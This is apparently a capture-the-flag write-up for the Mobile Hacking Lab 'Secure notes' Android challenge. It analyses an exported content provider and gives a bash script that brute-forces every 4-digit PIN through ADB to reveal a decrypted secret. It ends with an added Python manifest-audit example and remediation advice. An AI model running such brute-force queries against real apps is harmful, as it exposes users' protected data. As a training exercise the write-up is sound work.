Secure notes

Hello everyone. In this blog post, I will try to explain my solution steps for the Secure notes challenge from the Mobile Hacking Lab platform. I hope it will be useful for you.

  1. Let's examine the AndroidManifest.xml.

  2. After that, I found 2 providers (com.mobilehackinglab.securenotes.secretprovider and androidx.startup.InitializationProvider) and 1 exported activity (MainActivity).

  3. The MainActivity interacts with a content provider to validate a PIN and retrieve a secret value associated with that PIN.

  4. There is a listener set on submitPinButton:

    1. When the button is clicked, the code calls the onCreate$lambda$0() function,

    2. which then retrieves the text from pinEditText,

    3. and then uses querySecretProvider to validate the entered PIN.

  5. Let's analyze com.mobilehackinglab.securenotes.SecretDataProvider:

    1. First of all, the correct PIN uses a key to decrypt the data stored in the config.properties file.

    2. Then let's keep going through the code.

    3. It takes a query string.

    4. It checks whether the string is null and, if so, returns null.

    5. If there is a value, it removes the prefix and then extracts the integer from it.

    6. In the end, it invokes decryptSecret().

    7. If the returned Cursor is valid, the code looks for the secret column to query the PIN.

    8. If a valid cursor is returned and data is available, the code looks for a column named "Secret", expecting this to hold the result of the query.

  6. Let's go back to the config.properties file and try to decrypt it manually.

  7. Let's try to brute-force the PIN to get the decrypted text:

    #!/bin/bash
    
    # Define the content provider URI
    CONTENT_URI="content://com.mobilehackinglab.securenotes.secretprovider"
    
    # Loop through all 4-digit PIN combinations (0000 to 9999)
    for pin in $(seq -w 0000 9999); do
        echo "Trying PIN: $pin"
    
        # Use ADB to send the query to the content provider once and keep the output
        result=$(adb shell content query --uri "$CONTENT_URI" --where "pin=$pin")
        echo "$result"
    
        # Check the output to see if it indicates a successful attempt
        # Assuming "Secret" is returned upon success, otherwise adjust the condition
        if echo "$result" | grep -q "Secret"; then
            echo "PIN found: $pin"
            break
        fi
    done
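
The manifest review in steps 1 and 2, as an added example that is not part of the original post: a small Python audit that lists the components other apps can reach and whether a permission guards them. It assumes a manifest already decoded to plain XML (for example by apktool or jadx); `SAMPLE_MANIFEST` is constructed for illustration and its exported values are assumptions, not the challenge app's real file.

```python
import xml.etree.ElementTree as ET

A = "{http://schemas.android.com/apk/res/android}"  # android: attribute namespace
COMPONENTS = ("activity", "activity-alias", "service", "receiver", "provider")

# Constructed sample, NOT the challenge app's real manifest: it reuses the
# component names from the write-up and assumes their exported values.
SAMPLE_MANIFEST = """
<manifest xmlns:android="http://schemas.android.com/apk/res/android"
    package="com.mobilehackinglab.securenotes">
  <application>
    <activity android:name=".MainActivity" android:exported="true"/>
    <provider android:name=".SecretDataProvider"
        android:authorities="com.mobilehackinglab.securenotes.secretprovider"
        android:exported="true"/>
    <provider android:name="androidx.startup.InitializationProvider"
        android:authorities="com.mobilehackinglab.securenotes.androidx-startup"
        android:exported="false"/>
  </application>
</manifest>
"""


def exported_components(manifest_xml):
    """List components other apps can reach, noting whether a permission guards them."""
    findings = []
    for comp in ET.fromstring(manifest_xml.strip()).iter():
        if comp.tag not in COMPONENTS:
            continue
        exported = comp.get(A + "exported")
        if exported is None:
            # Attribute omitted: an intent-filter implies exported; otherwise
            # treat as private (the provider default since API level 17).
            exported = "true" if comp.find("intent-filter") is not None else "false"
        if exported != "true":
            continue
        guards = [comp.get(A + k) for k in ("permission", "readPermission", "writePermission")]
        findings.append({
            "type": comp.tag,
            "name": comp.get(A + "name"),
            "authorities": comp.get(A + "authorities"),
            "guarded": any(guards),
        })
    return findings


if __name__ == "__main__":
    for f in exported_components(SAMPLE_MANIFEST):
        status = "permission-guarded" if f["guarded"] else "NO permission required"
        print(f'{f["type"]:9} {f["name"]} ({f["authorities"]}): {status}')
```

An exported provider reported without a permission is the case to fix first: set `android:exported="false"` or require a signature-level permission so other apps cannot query it.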
